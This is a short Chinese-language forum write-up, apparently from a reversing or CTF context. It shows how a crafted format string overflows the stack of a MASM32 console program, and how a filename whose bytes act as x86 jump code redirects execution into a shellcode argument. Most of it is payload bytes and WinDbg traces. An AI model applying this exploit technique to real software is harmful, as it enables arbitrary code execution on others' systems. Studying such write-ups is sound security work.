bin是用masm32编译的console程序,构造fmt1如下
[COLOR=
"Red"
]fmt1 db 0f4h,55h,88h,7ch,
'%'
,0,
'2'
,0,
'5'
,0,
'6'
,0,
'x'
,0,
'%'
,0,
's'
,0,0,0[
/COLOR
]
fmt1中第一个dword的值来源于kernel32中的一个指向argv的指针
[COLOR=
"red"
]0:000> ? poi(kernel32!GetCommandLineA+1)
Evaluate expression: 2089309684 = 7c8855f4[
/COLOR
]
fmt1中的%256x往栈里填充512字节
%s会将第一个dword 0x7c8855f4作为字符串指针往栈里拷贝
经过以上填充和拷贝,返回地址被argv指针覆盖
构造bin文件名
[COLOR=
"red"
]BuAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.exe[
/COLOR
]
cmd下加参数helloworld!!!!!!!!!!!!运行
[COLOR=
"red"
]C:\>BuAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.exe helloworld!!!!!!!!!!![
/COLOR
]
溢出发生并返回时时,eip指向argv
[COLOR=
"red"
]0:000> da eip
001423b8
"BuAaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
001423d8
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa."
001423f8
"exe helloworld!!!!!!!!!!!"
[
/COLOR
]
文件名经过构造
'BuA'
可以执行,单步两步
[COLOR=
"red"
]eax=ffffffff ebx=7ffd3000 ecx=0000145a edx=7ffffff5 esi=01cd7a94 edi=b3428be6
eip=001423b8 esp=0012ffc4 ebp=00300020 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
001423b8 42 inc edx
0:000> p
eax=ffffffff ebx=7ffd3000 ecx=0000145a edx=7ffffff6 esi=01cd7a94 edi=b3428be6
eip=001423b9 esp=0012ffc4 ebp=00300020 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
001423b9 7541 jne 001423fc [br=1]
0:000> p
eax=ffffffff ebx=7ffd3000 ecx=0000145a edx=7ffffff6 esi=01cd7a94 edi=b3428be6
eip=001423fc esp=0012ffc4 ebp=00300020 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
001423fc 68656c6c6f push 6F6C6C65h[
/COLOR
]
此时eip指向参数
[COLOR=
"red"
]0:000> da eip
001423fc
"helloworld!!!!!!!!!!!"
[
/COLOR
]
只要把shellcode作为参数用以上方法执行,即可执行任意代码